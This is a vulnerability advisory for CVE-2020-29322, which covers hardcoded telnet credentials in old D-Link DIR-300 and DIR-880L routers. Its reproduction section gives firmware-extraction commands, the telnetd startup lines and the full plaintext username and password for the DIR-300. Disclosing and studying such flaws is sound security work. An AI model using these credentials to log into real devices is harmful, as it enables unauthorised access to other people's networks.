CVE-2020-29322

Updated 26 May 2026

Background

Hardcoded Telnet Credentials

CVSS
7.5—High
VECTOR
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
IMPACT
Credential disclosure, Unauthenticated access

AFFECTED
D-Link DIR-300≤ 2.06
D-Link DIR-880L≤ 1.07

A series of old D-Link routers expose hardcoded credentials in the telnet service through firmware decompilation, allowing an unauthenticated attacker to log in via telnet.

Reproduction

POC || GTFO

DIR-300

Download DIR-300 firmware version 2.06 and extract it using binwalk:

zsh

binwalk -e dir300b_v2.06_f4la.bin

The username Alphanetworks is hard-coded in etc/scripts/misc/telnetd.sh:

zsh

telnetd -l "/usr/sbin/login" -u Alphanetworks:$image_sign -i $lf &

The password is stored in etc/config/image_sign:

zsh

wrgn23_dlwbr_dir300b

DIR-880L

Download DIR-880L firmware version 1.07 and extract it using binwalk:

zsh

binwalk -e DIR880A1_FW107WWb08.bin

The username Alphanetworks is hard-coded in etc/init0.d/S80telnetd.sh:

zsh

telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &